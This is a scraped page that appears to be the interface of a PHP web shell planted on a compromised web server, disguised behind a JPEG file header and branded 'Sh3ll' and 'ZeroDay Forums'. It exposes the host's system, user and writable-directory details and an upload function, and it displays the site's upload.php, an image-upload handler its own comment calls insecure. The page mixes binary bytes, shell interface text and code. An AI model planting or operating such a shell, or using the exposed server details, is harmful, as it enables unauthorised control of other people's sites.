ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkeweb2/upanh/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/thietkeweb2/upanh/upload.php
<?php

/*
  This is a ***DEMO*** , the backend / PHP provided is very basic. You can use it as a starting point maybe, but ***do not use this on production***. It doesn't preform any server-side validation, checks, authentication, etc.

  For more read the README.md file on this folder.

  Based on the examples provided on:
  - http://php.net/manual/en/features.file-upload.php
*/

header('Content-type:application/json;charset=utf-8');
try {
    if (
        !isset($_FILES['file']['error']) ||
        is_array($_FILES['file']['error'])
    ) {
        throw new RuntimeException('Invalid parameters.');
    }

    switch ($_FILES['file']['error']) {
        case UPLOAD_ERR_OK:
            break;
        case UPLOAD_ERR_NO_FILE:
            throw new RuntimeException('No file sent.');
        case UPLOAD_ERR_INI_SIZE:
        case UPLOAD_ERR_FORM_SIZE:
            throw new RuntimeException('Exceeded filesize limit.');
        default:
            throw new RuntimeException('Unknown errors.');
    }

    $filepath = sprintf('files/%s_%s', uniqid(), $_FILES['file']['name']);
    include '../lib/class.upload.php';
    include '../include/configs.php';
    $handle = new upload($_FILES['file']);
    if ($handle->uploaded) {
        $v_image_name = 'share_image_'.time().'_'.uniqid();
        $handle->allowed = array('image/*');
        $handle->file_new_name_body  = $v_image_name;
        $handle->file_max_size = '3000000';
        $year_now = date('Y');
        $month_now = date('m');
        $v_folder = $year_now . "/" . $month_now;
        if (!is_dir("../upload/custom/" . $v_folder)) {
            mkdir("../upload/custom/" .$v_folder,0755,true);
        }
        $handle->process('../upload/custom/'.$v_folder.'/');
        $ext = $handle->file_src_name_ext;
        $filepath = $INFO['home_url'].'upload/custom/'.$v_folder.'/'.$v_image_name.'.'.$ext;
        if ($handle->processed) {
            $handle->clean();
        }
    }

    /*if (!move_uploaded_file(
        $_FILES['file']['tmp_name'],
        $filepath
    )) {
        throw new RuntimeException('Failed to move uploaded file.');
    }*/

    // All good, send the response
    echo json_encode([
        'status' => 'ok',
        'path' => $filepath,
        'txt_img_id'=>1
    ]);

} catch (RuntimeException $e) {
	// Something went wrong, send the err message as JSON
	http_response_code(400);
	echo json_encode([
		'status' => 'error',
		'message' => $e->getMessage()
	]);
}

ZeroDay Forums Mini